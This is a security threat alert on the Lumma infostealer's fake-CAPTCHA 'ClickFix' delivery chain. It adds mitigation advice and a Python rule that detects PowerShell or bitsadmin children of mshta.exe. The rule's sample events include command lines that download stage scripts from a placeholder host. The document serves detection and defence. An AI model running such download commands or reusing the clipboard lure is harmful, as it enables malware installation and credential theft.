Lumma Infostealer: Delivering Malware via Fake CAPTCHA Pages

In recent years, researchers have observed a surge in information-stealing (infostealer) malware and in its level of sophistication. An infostealer's purpose is to gather sensitive information such as financial data, or data stored on a device such as credentials, browser and cookie data, documents and machine details.

Threat alert
January 31, 2025

The tactic Lumma Stealer uses has been named "ClickFix" by researchers at Sekoia. Lumma malware distribution has been facilitated through a large-scale malvertising campaign that masquerades as CAPTCHA verification. The malware also monitors clipboard activity: when a crypto wallet address is copied, it replaces it with one controlled by the attacker.

In this attack scenario, users are redirected to a fake CAPTCHA verification page containing a JavaScript snippet that copies a malicious PowerShell command to the victim's clipboard. The user is then instructed to paste and run the command in the Windows Run dialog box; once executed, it downloads a malicious HTA file.

Once the HTA file runs, it downloads additional PowerShell scripts, which are encrypted with AES. These scripts are responsible for executing the final Lumma Stealer payload.

Recommendations

  • Use browser extensions to block malicious scripts and mitigate the risk of drive-by downloads.
  • Monitor network traffic for unusual patterns, particularly related to outbound communications to unfamiliar IP addresses or domains.
  • Create detection rules for PowerShell or bitsadmin processes whose parent process is mshta.exe and whose command line contains a URL.
  • Restrict and prevent non-admin users from running scripts.
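The mshta.exe parent-process rule from the recommendations, worked through as an added example (not part of the original alert) over constructed process-creation events. The field names (Image, ParentImage, CommandLine) are an assumption modelled on Sysmon-style telemetry; the example also treats pwsh.exe (PowerShell 7) as a PowerShell process, which goes slightly beyond the alert's wording.

```python
import re
from typing import Dict, List

# Constructed sample process-creation events; not real telemetry from the campaign.
# Field names are an assumption about the log schema (Sysmon-style naming).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": 'powershell -Command "Invoke-WebRequest http://example.invalid/stage"'},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"bitsadmin /transfer job https://example.invalid/x.ps1 C:\Users\Public\x.ps1"},
    # Same URL pattern but launched from explorer.exe: outside this rule's scope.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -Command "Invoke-WebRequest https://example.invalid/doc"'},
    # mshta.exe child without a URL in the command line: not matched.
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "cmd /c echo hi"},
]

# Child processes the alert names (pwsh.exe added as the PowerShell 7 binary).
CHILD_NAMES = {"powershell.exe", "pwsh.exe", "bitsadmin.exe"}
PARENT_NAME = "mshta.exe"
# Conservative URL matcher: scheme followed by non-whitespace characters.
URL_RE = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_suspicious(event: Dict[str, str]) -> bool:
    """True when a PowerShell/bitsadmin child of mshta.exe carries a URL."""
    return (basename(event.get("Image", "")) in CHILD_NAMES
            and basename(event.get("ParentImage", "")) == PARENT_NAME
            and URL_RE.search(event.get("CommandLine", "")) is not None)


def detect(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Filter a batch of process-creation events down to rule matches."""
    return [e for e in events if is_suspicious(e)]


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print("ALERT:", basename(hit["Image"]), "<-", hit["CommandLine"])
```

Because mshta.exe rarely spawns PowerShell or bitsadmin in normal operation, the parent-process condition alone is a strong signal; the URL check mainly trims the remaining noise.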

More technical details can be found here